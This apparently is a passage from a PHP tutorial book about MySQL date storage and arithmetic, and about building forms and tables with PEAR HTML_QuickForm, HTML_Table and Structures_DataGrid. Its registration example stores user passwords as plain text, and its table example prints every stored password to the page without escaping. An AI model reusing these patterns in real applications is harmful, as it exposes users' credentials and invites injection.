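<?php
date_default_timezone_set('UTC');

// Hypothetical helper: turn a flat list of cells into rows of equal length.
function cells_to_rows(array $cells, $columns = 7)
{
    // Pad the final row so every row has the same number of cells.
    $remainder = count($cells) % $columns;
    if ($remainder > 0) {
        $cells = array_pad($cells, count($cells) + $columns - $remainder, '');
    }
    return array_chunk($cells, $columns);
}

// Hypothetical helper: render the rows as a plain HTML table.
function rows_to_html(array $rows)
{
    $html = "<table>\n";
    foreach ($rows as $row) {
        $html .= '  <tr><td>' . implode('</td><td>', $row) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// February 2007 began on a Thursday, so three blank cells come first.
$start = strtotime('February 1st 2007');
$cells = array_merge(
    array_fill(0, (int) date('N', $start) - 1, ''),
    range(1, (int) date('t', $start))
);

$rows  = cells_to_rows($cells);
$table = rows_to_html($rows);
```

array_chunk does the job of the left-to-right, top-to-bottom filler: it cuts the flat list into consecutive rows of seven.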


How do I store dates in MySQL?
Human-readable dates come in a variety of formats that can suit many situations.
However, these formats are not the best way to store dates.

At first glance, the easiest way to store dates in MySQL may appear to be to simply
drop them in exactly as they’d appear on a web page; for example, “8th March
2003”. Be warned—taking this route is the first step on the path to serious hair loss
and ulcers. For example, the WHERE clause in an SQL statement run against MySQL
will not allow you to do things like this:


       SELECT * FROM table WHERE date > '14th February 2007'



      '14th February 2007' is not a date value—it’s only a date represented by a string.
      It can’t be manipulated or compared as a date value until it is converted into such
      a value. If you store your dates as strings you’ll be forever converting them to and
      from date value data types. And who needs that kind of headache?

      Solution
      A far better way to store date information is to use a MySQL timestamp.

      To get the current time, in the current server’s local timezone, we can use the NOW
      or CURRENT_TIMESTAMP functions. We can also use the UTC_TIMESTAMP function to
      obtain the current timestamp in UTC:

       mysql> SELECT CURRENT_TIMESTAMP();
       +---------------------+
       | CURRENT_TIMESTAMP() |
       +---------------------+
       | 2007-11-05 21:18:28 |
       +---------------------+

       mysql> SELECT NOW();
       +---------------------+
       | NOW()               |
       +---------------------+
       | 2007-11-05 21:18:32 |
       +---------------------+

       mysql> SELECT UTC_TIMESTAMP();
       +---------------------+
       | UTC_TIMESTAMP()     |
       +---------------------+
       | 2007-11-06 02:18:44 |
       +---------------------+



      Discussion
      MySQL timestamps are simpler than Unix timestamps. The generalized form is
      YYYY-MM-DD HH:MM:SS and is typically stored in a column of type DATETIME (not to
      be confused with the column types DATE and TIME, which store only YYYY-MM-DD
      and HH:MM:SS respectively).

Timestamps in this form are perfect for simple sorting and comparison operations,
and they have the advantage of being human-readable. They also have a predictable
length (until we get to the year 9999), which makes them easier to validate.

You can take advantage of the many native MySQL date and time functions via the
native MySQL DATETIME column type, which is also easy to convert to a Unix
timestamp if required.
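
As a rough illustration of the last two points, the following sketch validates a MySQL timestamp string and converts it to and from a Unix timestamp in PHP. The function names are hypothetical helpers of our own, the values are treated as UTC purely for the sake of the example, and DateTimeImmutable requires PHP 5.5 or later.

```php
<?php
// Hypothetical helpers for illustration; they are not part of PHP or MySQL.

// Returns true when $value is a well-formed YYYY-MM-DD HH:MM:SS string
// that names a real calendar date and time.
function isMysqlDatetime($value)
{
    $utc = new DateTimeZone('UTC');
    $parsed = DateTimeImmutable::createFromFormat('!Y-m-d H:i:s', $value, $utc);

    // Round-tripping rejects overflowing values such as 2007-02-30.
    return $parsed !== false && $parsed->format('Y-m-d H:i:s') === $value;
}

// Converts a MySQL timestamp, interpreted as UTC, to a Unix timestamp.
function mysqlToUnix($value)
{
    $utc = new DateTimeZone('UTC');
    return DateTimeImmutable::createFromFormat('!Y-m-d H:i:s', $value, $utc)
        ->getTimestamp();
}

// Converts a Unix timestamp back to a MySQL timestamp in UTC.
function unixToMysql($timestamp)
{
    return gmdate('Y-m-d H:i:s', $timestamp);
}

var_dump(isMysqlDatetime('2007-11-05 21:18:28')); // bool(true)
var_dump(isMysqlDatetime('2007-02-30 00:00:00')); // bool(false)
echo unixToMysql(mysqlToUnix('2007-11-05 21:18:28')), "\n";
```

If your timestamps are stored in the server’s local timezone rather than UTC, you’d pass that timezone instead.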


How do I format MySQL timestamps?
MySQL timestamps, while human-readable, are not exactly human-friendly—you
probably wouldn’t use them on your birthday party invitations, for example. Instead
of 2008-02-14 13:00:00 I’m sure you’d much prefer to write “February 14th, 2008
at 1 p.m.” Lucky for us, making MySQL timestamps human-friendly is extremely
easy—your party invitations will look great. I promise!

Solution
MySQL, like PHP, has a date formatting function which, aptly, is named the
DATE_FORMAT function. To use this function, we simply pass a format string and a
timestamp as follows:

 mysql> SELECT DATE_FORMAT(NOW(), "%W %M %D, %Y");
 +------------------------------------+
 | DATE_FORMAT(NOW(), "%W %M %D, %Y") |
 +------------------------------------+
 | Monday October 8th, 2007           |
 +------------------------------------+

      Table 4.2. DATE_FORMAT Specifiers

      Specifier        Description
      %a               abbreviated weekday name (Sun … Sat)
      %b               abbreviated month name (Jan … Dec)
      %c               month, numeric (0 … 12)
      %D               day of the month with English suffix (0th, 1st, 2nd, 3rd, …)
      %d               day of the month, numeric (00 … 31)
      %e               day of the month, numeric (0 … 31)
      %f               microseconds (000000 … 999999)
      %H               hour (00 … 23)
      %k               hour (0 … 23)
      %h or %I         hour (01 … 12)
      %l               hour (1 … 12)
      %i               minutes, numeric (00 … 59)
      %M               month name (January … December)
      %m               month, numeric (00 … 12)
      %p               AM or PM
      %r               time, 12-hour (hh:mm:ss followed by AM or PM)
      %S or %s         seconds (00 … 59)
      %T               time, 24-hour (hh:mm:ss)
      %W               weekday name (Sunday … Saturday)
      %w               day of the week (0=Sunday … 6=Saturday)
      %Y               year, numeric, four digits
      %y               year, numeric, two digits
      %%               a literal % character


      Much like the PHP date function, the DATE_FORMAT function uses a format string
      containing specifiers to define the formatting. A list of commonly used specifiers
      can be seen in Table 4.2.
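
For comparison, here’s a small sketch of how the same output could be produced on the PHP side from a value read out of a DATETIME column. The sample value and the choice of UTC are assumptions made for the example, and DateTimeImmutable requires PHP 5.5 or later.

```php
<?php
// A fixed example value, as it might come back from a DATETIME column.
$mysqlTimestamp = '2007-10-08 21:32:20';

$date = DateTimeImmutable::createFromFormat(
    'Y-m-d H:i:s',
    $mysqlTimestamp,
    new DateTimeZone('UTC') // assumption: the stored value is in UTC
);

// l = weekday name (%W), F = month name (%M),
// jS = day of the month with English suffix (%D), Y = four-digit year (%Y)
$formatted = $date->format('l F jS, Y');

echo $formatted, "\n"; // Monday October 8th, 2007
```

Formatting in the query keeps the PHP code simpler, while formatting in PHP leaves the raw value available for other uses; which one suits you will depend on the application.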


How do I perform date calculations using MySQL?
When performing queries, it’s not uncommon to need to specify a date range.
You may, for example, need to retrieve all blog posts created within the
last 30 days. Date calculations are a breeze in MySQL; let’s have a look at them.

Solution
You can perform complex date math using the MySQL date functions. We can add
and subtract time intervals that are identified using the INTERVAL keyword via the
DATE_ADD and DATE_SUB functions. Thus, we use DATE_ADD to add one day:


 mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 DAY);
 +---------------------------------+
 | DATE_ADD(NOW(), INTERVAL 1 DAY) |
 +---------------------------------+
 | 2007-10-09 21:32:20             |
 +---------------------------------+



Likewise, we use DATE_SUB to subtract one day:

 mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 DAY);
 +---------------------------------+
 | DATE_SUB(NOW(), INTERVAL 1 DAY) |
 +---------------------------------+
 | 2007-10-07 21:32:26             |
 +---------------------------------+



We can also add or subtract months and years:

 mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 MONTH);
 +-----------------------------------+
 | DATE_ADD(NOW(), INTERVAL 1 MONTH) |
 +-----------------------------------+
 | 2007-11-08 21:31:05               |
 +-----------------------------------+

 mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 MONTH);
 +-----------------------------------+
 | DATE_SUB(NOW(), INTERVAL 1 MONTH) |
 +-----------------------------------+
 | 2007-09-08 21:31:55               |
 +-----------------------------------+

 mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 YEAR);
 +----------------------------------+
 | DATE_ADD(NOW(), INTERVAL 1 YEAR) |
 +----------------------------------+
 | 2008-10-08 21:32:31              |
 +----------------------------------+

 mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 YEAR);
 +----------------------------------+
 | DATE_SUB(NOW(), INTERVAL 1 YEAR) |
 +----------------------------------+
 | 2006-10-08 21:32:37              |
 +----------------------------------+



      We can use more human-friendly terms when writing SQL queries in MySQL, such
      as 1 DAY, 1 MONTH, and 1 YEAR, than when we deal with Unix timestamps, which
      are measured in seconds. With MySQL, we can use the DATE_SUB and DATE_ADD
      functions to retrieve database records within a certain date range. Here, we get all
      the data with an updated_date within the last 30 days:

       SELECT * FROM my_table WHERE
         updated_date >= DATE_SUB(NOW(), INTERVAL 30 DAY);


      Similarly, the following will yield the rows with an updated_date that’s at least
      one week old, but no more than 14 days old:

       SELECT * FROM my_table WHERE
         updated_date BETWEEN DATE_SUB(NOW(), INTERVAL 14 DAY)
         AND DATE_SUB(NOW(), INTERVAL 7 DAY);


      As you can see, MySQL date functions make it incredibly easy to calculate dates,
      thanks to the use of human-friendly terms.
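
If you’d rather compute the range boundaries in PHP and pass them to the query as bound parameters, a sketch along the following lines should work. The fixed starting time and the variable names are assumptions chosen to mirror the MySQL output above, and DateTimeImmutable requires PHP 5.5 or later.

```php
<?php
// A fixed "now" keeps the example reproducible; in real code you would
// typically start from new DateTimeImmutable('now').
$now = new DateTimeImmutable('2007-10-08 21:32:20', new DateTimeZone('UTC'));

$format = 'Y-m-d H:i:s';

// Equivalent of DATE_SUB(NOW(), INTERVAL 30 DAY)
$thirtyDaysAgo = $now->sub(new DateInterval('P30D'))->format($format);

// Equivalents of the 14-day and 7-day boundaries used with BETWEEN
$twoWeeksAgo = $now->sub(new DateInterval('P14D'))->format($format);
$oneWeekAgo  = $now->sub(new DateInterval('P7D'))->format($format);

// Equivalent of DATE_ADD(NOW(), INTERVAL 1 MONTH)
$nextMonth = $now->add(new DateInterval('P1M'))->format($format);

echo $thirtyDaysAgo, "\n"; // 2007-09-08 21:32:20
echo $twoWeeksAgo, "\n";   // 2007-09-24 21:32:20
echo $oneWeekAgo, "\n";    // 2007-10-01 21:32:20
echo $nextMonth, "\n";     // 2007-11-08 21:32:20
```

One caveat: the two systems treat month ends differently. Adding one month to January 31 in MySQL gives the last day of February, whereas PHP rolls the extra days over into March, so it’s worth doing month arithmetic in one place only.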


      Summary
      In this chapter, we’ve investigated the use of Unix timestamps and the flexibility
      of the PHP strtotime and date functions, so that we can complete almost any job
      involving dates and times without raising a sweat. We’ve also seen that MySQL offers
      a range of date functions, and that combining DATE_SUB or DATE_ADD with the
      INTERVAL keyword gives us capabilities similar to those available in PHP.

You may be wondering which approach you should take in making your own date
calculations—should you use the PHP functions or try the MySQL functions? The
decision is an easy one: when the timestamps are stored in a database, it’s quicker
to use the MySQL method. However, as we saw in the calendar example in this
chapter, when the timestamps don’t originate in the database, it’s quicker to use
the PHP approach.

None of us can escape the relentless march of time, but when we harness the power
of the PHP date functions we can, at least, master time calculations and presentation.
Functions like strtotime and date may seem simplistic at first glance, but can be
used with great sophistication in your web applications.
Chapter 5

Forms, Tables, and Pretty URLs
Creating interactive web pages is what PHP is all about. As you use PHP to build
web sites and applications, you’ll quickly notice that you’re called upon to develop
the same web page elements over and over.

When you’re working on your first PHP web site, writing a script to generate an
HTML table may not seem like a huge problem, but give it time: after you’ve put
together a few sites and have had to go back to modify your past efforts again and
again, working on tables won’t seem so rosy. Eventually, the mere mention of the
word “maintenance” may well have you gasping “Not another table!” as you weep
quietly into your keyboard.

Fear not: help is at hand! Not all HTML is the same, yet there are obvious
commonalities between HTML elements. These commonalities make the perfect targets for
PHP’s classes, which allow you to eliminate repetitive work and concentrate on the
creative aspects of programming that you enjoy.

In this chapter, we’ll provide solutions for some of the most common tasks: building
forms, building tables, and creating pretty URLs. In the process, we’ll make extensive
      use of some of PEAR’s HTML packages—as a step up from hand coding your own
      HTML forms and tables, PEAR represents excellent value.

      Some of the examples we’ll discuss here will use the following database tables.
      First up, a table for users:

                                                                  chapter_05.sql (excerpt)

       CREATE TABLE user (
         id          INT(11)     NOT NULL AUTO_INCREMENT,
         login       VARCHAR(50) NOT NULL DEFAULT '',
         password    VARCHAR(50) NOT NULL DEFAULT '',
         email       VARCHAR(50)          DEFAULT NULL,
         first_name VARCHAR(50)           DEFAULT NULL,
         last_name   VARCHAR(50)          DEFAULT NULL,
         signature   TEXT        NOT NULL,
         PRIMARY KEY (id),
         UNIQUE KEY user_login (login)
       );



      We’ll also use this table to store images:

                                                                  chapter_05.sql (excerpt)

       CREATE TABLE user_images (
         image_id    INT(11)             NOT   NULL AUTO_INCREMENT,
         user_id     INT(11)             NOT   NULL,
         type        VARCHAR(50)         NOT   NULL DEFAULT '',
         filename    VARCHAR(32)         NOT   NULL,
         PRIMARY KEY (image_id)
       );




      How do I build HTML forms with PHP?

      HTML forms are the key input mechanism for user data on a web site. As web
      developers, we must handle several facets of HTML forms:

      ■ form generation
      ■ form validation
      ■ retrieving valid form data
      ■ repopulating invalid forms with submitted data


Solution
Thankfully, PEAR comes to the rescue with HTML_QuickForm,[1] which aims to do
exactly as its name states: make forms quickly. HTML_QuickForm can help to
automate all the tasks associated with form building.


          Using HTML_QuickForm2
         At the time of writing, PEAR had released an alpha version of the
         HTML_QuickForm2 class.[2] This new version is written specifically for PHP 5 and
         is compatible with the E_STRICT level of error reporting.


Our first example demonstrates how easy it is to build a registration form using the
HTML_QuickForm class. We begin our form by including the HTML/QuickForm.php
file and instantiating our HTML_QuickForm object:

                                                                     htmlForm.php (excerpt)

    <?php
      require_once 'HTML/QuickForm.php';
      $form = new HTML_QuickForm('Create', 'post', basename(__FILE__));



The arguments supplied to the constructor represent the form’s name, method, and
action HTML attributes.

Next, we start to add the required form elements using the addElement method:

                                                                     htmlForm.php (excerpt)

      $opts = array('size' => 20, 'maxlength' => 255);
      $form->addElement('static', 'header', null,
          '<h1>Register</h1>'
      );
      $form->addElement('text', 'first_name', 'First Name', $opts);
      $form->addElement('text', 'last_name', 'Last Name', $opts);
      $form->addElement('text', 'login', 'Login Name', $opts);
      $form->addElement('password', 'password', 'Password', $opts);
      $form->addElement('text', 'email', 'E-Mail', $opts);
      // Named 'validemail' so it can be removed by name before the form is frozen
      $form->addElement('static', 'validemail', null,
          '<strong>E-Mail address must be valid, and will only be' .
          ' used for account verification.</strong>'
      );
      $form->addElement('textarea', 'signature', 'Signature',
          array('rows' => 10, 'cols' => 20));
      $form->addElement('file', 'avatar', 'Avatar Image');
      $form->addElement('static', 'reqs', null,
          '<strong>Image <em>must</em> be no more than 64x64 pixels' .
          ' in size.</strong>'
      );
      $form->addElement('submit', 'register', "Register Now!");


[1] http://pear.php.net/package/HTML_QuickForm/
[2] http://pear.php.net/package/HTML_QuickForm2/




      The first argument passed to the addElement method represents the element type.
      Many element types are possible, and each is represented by a PHP class. The full
      list is available on the “QuickForm element types” PEAR documentation page.[3]

      The element types we’ve used above include static, which represents static HTML
      content that’s not submitted with the form. We’ve used static elements for the
      heading and form help text. The other types we’ve used include text, password,
      textarea, file, and submit; each represents its respective HTML form element
      equivalent.

      The remaining arguments, which we’ve passed to the addElement method, are
      subsequently passed to the constructor methods of the appropriate type classes and,
      as such, are specific to those classes. The “QuickForm element types” PEAR
      documentation page has all the details you’ll need to use these classes.[4]

      After we’ve added the form elements, we can obtain the form HTML source using
      the toHtml method:

                                                                               htmlForm.php (excerpt)

            $formsource = $form->toHtml();
          ?>



      The only thing that’s left to do is add the form source to a web page:

      [3] http://pear.php.net/manual/en/package.html.html-quickform.intro-elements.php
      [4] http://pear.php.net/manual/en/package.html.html-quickform.intro-elements.php


                                                                      htmlForm.php (excerpt)

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   ⋮ HTML head contents…
   </head>
   <body>
     <?php echo $formsource; ?>
   </body>
 </html>



The code above renders as shown in Figure 5.1.




                           Figure 5.1. Our first registration form

      As you can see, this form really doesn’t do much, and apart from the fact that it
      was slightly easier to build this form than to hand-code the HTML, you might be
      forgiven for asking, “What’s all the fuss about?” Well, as you’ll see in the next
      example, we can add complex validation rules to the form with a minimum of fuss
      and bother.

      We use the addRule method to add validation rules to the form:[5]

                                                                     htmlFormValidation.php (excerpt)

          $form->addRule('first_name',
              'You must enter your first name',
              'required', null, 'client'
          );
          $form->addRule('first_name',
              'Your first name must be at least 3 letters',
              'minlength', '3', 'client'
          );



      The first argument to the addRule method is the form element name, which is
      followed by the error message. The third argument indicates the type of validation
      required. It’s followed by an optional argument for that validation type, and an
      optional indication of where the validation should occur; this setting can specify
      client or server. If it specifies client, JavaScript validation is added to the form
      to support the rule.

      You may have noticed in the code above that you can add multiple rules for a single
      form element. We can see that the first rule in the code above is a required rule,
      which indicates that the field cannot be blank. As no arguments are required for
      this rule, the next argument is null. The final argument indicates the validation is
      to occur on the client, that is, the browser. The second rule is a minlength rule
      and the optional argument indicates that the first_name field value has a minimum
      length of 3 characters.
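
To make the idea of a rule more concrete, here’s a plain PHP sketch of what a few server-side checks of this kind amount to. It is not how HTML_QuickForm is implemented; the checkRule function, the rule array layout, and the sample submission are all hypothetical and exist only for illustration.

```php
<?php
// Hypothetical helper, written for illustration only. It mimics the idea of
// QuickForm's rules in plain PHP and is not how the PEAR package is implemented.
function checkRule($value, $type, $option = null)
{
    $value = (string) $value;
    switch ($type) {
        case 'required':
            return $value !== '';
        case 'minlength':
            // strlen() counts bytes, which is fine for this ASCII example.
            return strlen($value) >= (int) $option;
        case 'rangelength':
            list($min, $max) = $option;
            return strlen($value) >= $min && strlen($value) <= $max;
        case 'email':
            return filter_var($value, FILTER_VALIDATE_EMAIL) !== false;
        default:
            throw new InvalidArgumentException("Unknown rule type: $type");
    }
}

// Each rule: field name, error message, rule type, optional argument.
$rules = array(
    array('first_name', 'You must enter your first name', 'required', null),
    array('first_name', 'Your first name must be at least 3 letters', 'minlength', 3),
);

// Sample submission standing in for $_POST.
$submitted = array('first_name' => 'Al');

$errors = array();
foreach ($rules as $rule) {
    list($field, $message, $type, $option) = $rule;
    $value = isset($submitted[$field]) ? $submitted[$field] : '';
    // Report only the first failing rule per field.
    if (!isset($errors[$field]) && !checkRule($value, $type, $option)) {
        $errors[$field] = $message;
    }
}

print_r($errors);
```

Here the two-letter name passes the required check but fails the minlength check, so only the second message is reported.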

      We’re not limited to only those rules, however. Many other validation types are
      available, and they’re all handily documented on the PEAR web site.[6] Let’s go ahead
      and add more rules for the remaining elements:

      [5] http://pear.php.net/manual/en/package.html.html-quickform.html-quickform.addrule.php
      [6] http://pear.php.net/manual/en/package.html.html-quickform.intro-validation.php


                                                 htmlFormValidation.php (excerpt)

   $form->addRule('last_name',
       'You must enter your last name',
       'required', null, 'client'
   );
   $form->addRule('last_name',
       'Your last name must be at least 3 letters',
       'minlength', '3', 'client'
   );
   $form->addRule('email',
       'You must enter your email address',
       'required', null, 'client'
   );
   $form->addRule('email',
       'Please enter a valid email address',
       'email', FALSE, 'client'
   );
   $form->addRule('login',
       'You must enter a login name',
       'required', null, 'client'
   );
   $form->addRule('login',
       'Your login name must be between 6-20 characters long',
       'rangelength', array(6, 20), 'client'
   );
   $form->addRule('password',
       'You must enter a password',
       'required', null, 'client'
   );
   $form->addRule('password',
       'Your Password must be at least 6 characters long.',
       'minlength', '6', 'client'
   );



Now that we’ve added these rules, we can add some form handling code:

                                                           htmlFormValidation.php (excerpt)



         if ($form->validate())
         {
           $form->removeElement('validemail');
           $form->removeElement('reqs');
           $form->removeElement('avatar');
           $form->removeElement('register');
           $form->freeze();
           $formsource = $form->toHtml();
         }
         else
         {
           $formsource = $form->toHtml();
         }
       ?>



      The validate method allows us to check to see whether or not the form has been
      submitted, and passed all the validation requirements. If the form validates, you
      can add code at this step to manipulate the form data in some way—to save it to a
      database, for example. For the purposes of our example solution, we freeze the form
      and display it again. Elements that are frozen only display their values—not the
      editable form element. Of course, this makes no difference to static elements and
      buttons, so we remove those elements from the form before we freeze it. Using the
      freeze method to freeze the form allows us to add a confirmation step to the form
      submission process, which gives users a chance to review their information before
      they submit it.

      If the form has not passed validation, we simply display its HTML source. This step
      is also taken if the form has not yet been submitted. If validation errors have been
      detected, the validation rule error messages will be added to the form’s HTML
      source.

      You can see the rendered form in Figure 5.2. Notice how the presence of the
      validation rules has automatically inserted required field indicators. That image also
      shows the error message that was added by the server-side validation mechanism;
      you’ll have to disable JavaScript in your browser to see this message yourself.
      Figure 5.3 shows the frozen form.





Figure 5.2. The registration form with validation mechanisms




                                  Figure 5.3. The frozen registration form


      Now that we’ve validated the data submitted by our users, we need to accept and
      store it. Let’s look at an alternative to the above example, in which we extract the
      form data and insert it into our database. To extract the submitted data from the
      form, we simply use the exportValues method:

                                                                             htmlFormExport.php (excerpt)

       if ($form->validate())
         {
           $values = $form->exportValues();



      Now that we have our form data, we can make a database connection and insert it
      into the database:

                                                                             htmlFormExport.php (excerpt)

            require 'dbcred.php';
            try
            {
              $db = new PDO($dsn, $user, $password);
              $db->setAttribute(PDO::ATTR_ERRMODE,
                  PDO::ERRMODE_EXCEPTION);

              $sql = 'INSERT INTO user ' .
                     '(login, password, email, first_name, last_name,' .
                     ' signature) VALUES (:login, :password, :email,' .
                     ' :firstname, :lastname, :sig)';

              $stmt = $db->prepare($sql);
              $stmt->bindParam(':login', $values['login']);
              $stmt->bindParam(':password', $values['password']);
              $stmt->bindParam(':email', $values['email']);
              $stmt->bindParam(':firstname', $values['first_name']);
              $stmt->bindParam(':lastname', $values['last_name']);
              $stmt->bindParam(':sig', $values['signature']);
              $stmt->execute();




First, we insert the registration information into the user table. Using PDO and the
prepare and execute methods with bound parameters allows us to safely use the
form data in our SQL query. For more information about this technique, have a look
at “How do I add data to, or modify data in, my database?” in Chapter 2.

Next, we obtain the insert ID from the previous database insert operation; we’ll need
this in a moment. The $form->_submitFiles property contains an array of files that
were submitted with the form. We can use this information to gain access to the
avatar image file, and move it to the avatar directory, applying a unique filename
to it at the same time:

                                                         htmlFormExport.php (excerpt)

        $id = $db->lastInsertId();
        $type = $form->_submitFiles['avatar']['type'];
        $file = 'images/avatars/' . md5(microtime()) .
            basename($form->_submitFiles['avatar']['name']);

        move_uploaded_file(
            $form->_submitFiles['avatar']['tmp_name'],
            $file
        );
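
As an aside, here’s one possible way to build the destination filename a little more defensively. This is a sketch under our own assumptions rather than part of the original listing: the uniqueUploadName function and its 100-character cap are hypothetical, and random_bytes requires PHP 7 or later.

```php
<?php
// Hypothetical helper for illustration; the function name and the 100-character
// cap are assumptions, not part of HTML_QuickForm or the original listing.
function uniqueUploadName($originalName, $directory = 'images/avatars/')
{
    // basename() drops any directory components the client may have sent.
    $name = basename($originalName);

    // Keep only a conservative set of characters in the stored filename.
    $name = preg_replace('/[^A-Za-z0-9._-]/', '_', $name);
    $name = substr($name, -100);

    // 16 random bytes give a 32-character hexadecimal prefix.
    $prefix = bin2hex(random_bytes(16));

    return $directory . $prefix . '_' . $name;
}

echo uniqueUploadName('../../my avatar.png'), "\n";
```

Whichever naming scheme you use, note that the filename column in the user_images table is declared as VARCHAR(32), so a path of this length would need a wider column to be stored in full.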



We also need to insert this image file information into the user_images table. This
is a great opportunity to use that insert ID we saved in the previous operation:

                                                              htmlFormExport.php (excerpt)

                 $sql = 'INSERT INTO user_images' .
                     ' (user_id, type, filename) VALUES' .
                     ' (:id, :type, :file)';
                 $stmt = $db->prepare($sql);
                 $stmt->bindParam(':id', $id);
                 $stmt->bindParam(':type', $type);
                 $stmt->bindParam(':file', $file);
                 $stmt->execute();



      Our final task is to create the confirmation display:

                                                              htmlFormExport.php (excerpt)

                 $form->removeElement('validemail');
                 $form->removeElement('reqs');
                 $form->removeElement('avatar');
                 $form->removeElement('register');
                 $form->freeze();
                 $formsource = $form->toHtml() .
                     '<p>The above information has been successfully submitted</p>';
             }



      If, however, a database exception occurred, we’ll need to log the error and create
      the error message display:

                                                              htmlFormExport.php (excerpt)

             catch(PDOException $e)
             {
               error_log('Registration form error: '. $e->getMessage());
               $form->removeElement('validemail');
               $form->removeElement('reqs');
               $form->removeElement('avatar');
               $form->removeElement('register');
               $form->freeze();
               $formsource = $form->toHtml() .
                   '<p>An error has occurred. The above information was not' .
                   ' successfully submitted</p>';
             }
         }

Finally, as before, if the form hasn’t been submitted or hasn’t passed validation, we just display it:

                                                                    htmlFormExport.php (excerpt)

      else
      {
        $formsource = $form->toHtml();
      }



Using the HTML_QuickForm class allows you to quickly and efficiently add web page
forms to your web site or web application with a minimum of fuss. Make sure you
check out the PEAR documentation to discover all the other functionality available
in the class.[7]


How do I display data in a table?
Tables are an integral part of data display, which—let’s face it—is an integral part
of most web pages! So how do you easily display your data in a table, in a way that
automates most of the boring, repetitive pieces of table HTML you have to write?

Solution
The answer to this question is to use PEAR’s HTML_Table class.[8] In this example,
we’ll use HTML_Table to display the results of a simple SQL query.

First, we need to include the required PHP files:

                                                                          pearTable.php (excerpt)

    <?php
      require 'dbcred.php';
      require 'HTML/Table.php';



dbcred.php contains our database login credentials for use with PDO. The file contains
credentials relevant to our testing environment, so you’ll need to change them
should you wish to try this on your own web server. HTML/Table.php contains the
HTML_Table class.


[7] http://pear.php.net/package/HTML_QuickForm/
[8] http://pear.php.net/manual/en/package.html.html-table.php

      Next, we instantiate our PDO object and perform the SQL query. We open a try
      block to catch any PDOExceptions that may occur:

                                                                   pearTable.php (excerpt)

         try
         {
           $db = new PDO($dsn, $user, $password);
           $db->setAttribute(PDO::ATTR_ERRMODE,
               PDO::ERRMODE_EXCEPTION);

            $sql = "SELECT * FROM user";

            $stmt = $db->prepare($sql);
            $stmt->execute();



      The creation of the table is simple. We instantiate the HTML_Table object and call
      the setAutoGrow method, which activates a flag instructing HTML_Table to
      automatically add rows and columns when data is added into a non-existent cell. We then
      call the addRow method to add a header row:

                                                                   pearTable.php (excerpt)

            $table = new HTML_Table;
            $table->setAutoGrow(true);
            $table->addRow(array("","Login","Password","E-Mail",
                "First Name","Last Name","Signature"), null, "th");



      That row addition is followed by a while loop in which we call the addRow method
      to add the query results. The addRow method accepts an indexed array as an argument
      for the row content, so we need to call PDOStatement->fetch with the
      PDO::FETCH_NUM argument to make PDO return our row data as an indexed array.
      Finally, we call toHTML to assign the table HTML source to a variable:

                                                                   pearTable.php (excerpt)

            while ($row = $stmt->fetch(PDO::FETCH_NUM))
            {
                $table->addRow($row);
            }
            $tablesource = $table->toHTML();
         }




Our catch block simply logs any errors and sets the $tablesource variable to an
empty string, thus avoiding outputting any cryptic error messages to our web page
users:

                                                            pearTable.php (excerpt)

   catch (PDOException $e)
   {
     error_log('Error in '.$e->getFile().
         ' Line: '.$e->getLine().
         ' Error: '.$e->getMessage()
     );
     $tablesource = "";
   }
 ?>



The $tablesource variable can now be used in the web page output:

                                                            pearTable.php (excerpt)

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   ⋮ HTML head contents…
   </head>
   <body>
     <h1>PEAR::HTML_Table</h1>
     <?php echo $tablesource ?>
   </body>
 </html>



And we’re done! HTML_Table is a great time saver for outputting tabular data.
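
To appreciate what the class saves us from writing, here’s a rough hand-rolled equivalent of the header row and the row loop in plain PHP. The renderTable function and the sample rows are hypothetical, and this is not how HTML_Table works internally; it’s simply the kind of repetitive code the package lets us avoid.

```php
<?php
// Hypothetical helper for illustration; this is not HTML_Table's implementation.
function renderTable(array $headers, array $rows)
{
    $html = "<table>\n  <tr>";
    foreach ($headers as $header) {
        $html .= '<th>' . htmlspecialchars($header, ENT_QUOTES, 'UTF-8') . '</th>';
    }
    $html .= "</tr>\n";

    foreach ($rows as $row) {
        $html .= '  <tr>';
        foreach ($row as $cell) {
            // Escape every value so stored data can't inject markup.
            $html .= '<td>' . htmlspecialchars((string) $cell, ENT_QUOTES, 'UTF-8') . '</td>';
        }
        $html .= "</tr>\n";
    }

    return $html . "</table>\n";
}

// Sample rows standing in for the result of $stmt->fetch(PDO::FETCH_NUM).
$rows = array(
    array(1, 'jbloggs', 'joe@example.com'),
    array(2, 'a<b', 'amy@example.com'),
);

echo renderTable(array('', 'Login', 'E-Mail'), $rows);
```

The sketch escapes each cell with htmlspecialchars; whatever tool builds your table, it’s worth checking how user-supplied values such as signatures are escaped before they reach the page.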


      How do I display data in a sortable table?
      Usually there’s more to displaying tabular data than just putting it in a table. If you
      have large data sets, you might like to add user interface controls like column sorting
      or paging to your tables, so that your users can easily digest the content in small
      chunks.

      Solution
      The PEAR Structures_DataGrid class is more than capable of handling the job.[9]
      Structures_DataGrid has more features than I can list here, so we’ll only be using
      a few of them in our solution, which builds an HTML table with column sorting
      and paging controls. This solution also requires several PEAR packages to function
      properly. They are: Structures_DataGrid_DataSource_MDB2,[10]
      MDB2_Driver_mysql,[11] Structures_DataGrid_Renderer_HTMLTable,[12] and
      Structures_DataGrid_Renderer_Pager.[13] Once we’ve made sure all those PEAR
      packages are installed, we can get started on the solution.

      First, we need to include the required PHP files:

                                                                        pearDataGrid.php (excerpt)

          <?php
            require 'dbcred.php';
            require 'Structures/DataGrid.php';



      dbcred.php contains our database login credentials, which we’ll use with our
      Structures_DataGrid object. The file contains credentials relevant to our testing
      environment, so you’ll need to change them to suit should you wish to try this on
      your own web server. Structures/DataGrid.php is required to create our
      Structures_DataGrid object.

      The next step is to instantiate our Structures_DataGrid object and bind it to the
      SQL query:

      9 http://pear.php.net/package/Structures_DataGrid/
      10 http://pear.php.net/package/Structures_DataGrid_DataSource_MDB2/
